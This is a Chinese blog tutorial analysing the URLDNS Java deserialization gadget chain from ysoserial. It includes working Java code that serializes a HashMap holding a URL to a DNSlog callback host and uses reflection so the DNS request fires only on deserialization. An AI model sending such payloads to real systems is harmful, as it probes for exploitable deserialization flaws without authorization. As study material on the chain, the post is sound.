URLDNS链
创始人
2024-03-15 01:22:13

听说这个链子是最简单的链子之一了,但是却是来来回回看了好多遍才勉强看明白。

在 ysoserial 中我们可以看见链子是这样的:

*Gadget Chain:

* HashMap.readObject()

* HashMap.putVal()

* HashMap.hash()

* URL.hashCode()

简单流程:

1.HashMap接收一个类O(URL类)

2.类O(URL类)的hashCode()后续的一串链子可以发起DNS请求

3.HashMap的readObject刚好可以调用O.hashCode();

现在我们来编写类来观察如何触发DNS请求

package packet1;import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;public class SerializeTest{public static void serialize(Object obj) throws IOException {ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));oos.writeObject(obj);}public static void main(String[] args) throws Exception {HashMap hashmap = new HashMap();URL url = new URL("http://25d13c3b.dns.1433.eu.org");Class clazz = url.getClass();hashmap.put(url, 1);serialize(hashmap);}
}

这个类可以进行序列化,按照正常来说序列化的过程是不会进行DNS请求的,但是我们查看DNSlog平台:

发现序列化的时候就发起请求了,这样有几个非常不好的地方:

  1. 影响我们判断是否有URLDNS这个漏洞存在(因为我们是想要反序列化的时候触发)
  2. 最重要的是其实在序列化之后URL类里面的hashCode已经被改变了,反序列化的时候并不会触发

下图是URL类中的hashCode()方法;

这里只有当hashCode不为负一的时候才会走handler发起DNS请求

hashCode在初始化的时候已经被赋值成-1了:

但是我们序列化之后值已经被改变成为handler.hashCode

那么就有一个疑问,序列化的时候是怎么触发的?

我们跟进put:

发现会调用hash函数。跟进hash:

发现调用handler,并且此时hashCode的值被改变

跟进hashcode:

调用getProtocol(),调用getHost():

其他更细节的我就没跟进,但是我们需要知道调用URL的hashCode()之后,并且hashCode的值不为-1就会发起DNS请求。所以我们可以通过反射技术来改变值,以此来达到序列化的时候不进行DNS请求,但是反序列化的时候会进行DNS请求

所以让我们来改进代码:

序列化代码:

package packet1;import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;public class SerializeTest{public static void serialize(Object obj) throws IOException {ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));oos.writeObject(obj);}public static void main(String[] args) throws Exception {HashMap hashmap = new HashMap();URL url = new URL("http://25d13c3b.dns.1433.eu.org");Class clazz = url.getClass();Field field = clazz.getDeclaredField("hashCode");field.setAccessible(true);field.set(url, 1234);hashmap.put(url, 1);field.set(url, -1);serialize(hashmap);}
}

在put之前我们改变url的hashCode值不为-1,put之后我们把url的hashCode改为-1,之后再对hashmap进行序列化。

反序列化代码:

package packet1;import java.io.FileInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;public class UnSerializeTest {public static Object unSerialize(String Filename) throws IOException , ClassNotFoundException{ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));Object obj = ois.readObject();return obj;}public static void main(String[] args) throws IOException, ClassNotFoundException {unSerialize("ser.bin");}
}

经过测试之后,序列化的时候不会发起DNS请求,反序列化之后可以发起DNS请求.

相关内容

热门资讯

埃菲尔铁塔在哪 中国仿建埃菲尔... 2019年4月26日,广西南宁市,街头惊现一座巨型山寨版埃菲尔铁塔,高约20米,白色塔身,造型逼真,...
北京的名胜古迹 北京最著名的景... 北京从元代开始,逐渐走上帝国首都的道路,先是成为大辽朝五大首都之一的南京城,随着金灭辽,金代从海陵王...
苗族的传统节日 贵州苗族节日有... 【岜沙苗族芦笙节】岜沙,苗语叫“分送”,距从江县城7.5公里,是世界上最崇拜树木并以树为神的枪手部落...
长白山自助游攻略 吉林长白山游... 昨天介绍了西坡的景点详细请看链接:一个人的旅行,据说能看到长白山天池全凭运气,您的运气如何?今日介绍...
应用未安装解决办法 平板应用未... ---IT小技术,每天Get一个小技能!一、前言描述苹果IPad2居然不能安装怎么办?与此IPad不...
世界上最漂亮的人 世界上最漂亮... 此前在某网上,选出了全球265万颜值姣好的女性。从这些数量庞大的女性群体中,人们投票选出了心目中最美...
脚上的穴位图 脚面经络图对应的... 人体穴位作用图解大全更清晰直观的标注了各个人体穴位的作用,包括头部穴位图、胸部穴位图、背部穴位图、胳...
猫咪吃了塑料袋怎么办 猫咪误食... 你知道吗?塑料袋放久了会长猫哦!要说猫咪对塑料袋的喜爱程度完完全全可以媲美纸箱家里只要一有塑料袋的响...
demo什么意思 demo版本... 618快到了,各位的小金库大概也在准备开闸放水了吧。没有小金库的,也该向老婆撒娇卖萌服个软了,一切只...
埃菲尔铁塔在哪 中国仿建埃菲尔... 2019年4月26日,广西南宁市,街头惊现一座巨型山寨版埃菲尔铁塔,高约20米,白色塔身,造型逼真,...
北京的名胜古迹 北京最著名的景... 北京从元代开始,逐渐走上帝国首都的道路,先是成为大辽朝五大首都之一的南京城,随着金灭辽,金代从海陵王...
苗族的传统节日 贵州苗族节日有... 【岜沙苗族芦笙节】岜沙,苗语叫“分送”,距从江县城7.5公里,是世界上最崇拜树木并以树为神的枪手部落...
长白山自助游攻略 吉林长白山游... 昨天介绍了西坡的景点详细请看链接:一个人的旅行,据说能看到长白山天池全凭运气,您的运气如何?今日介绍...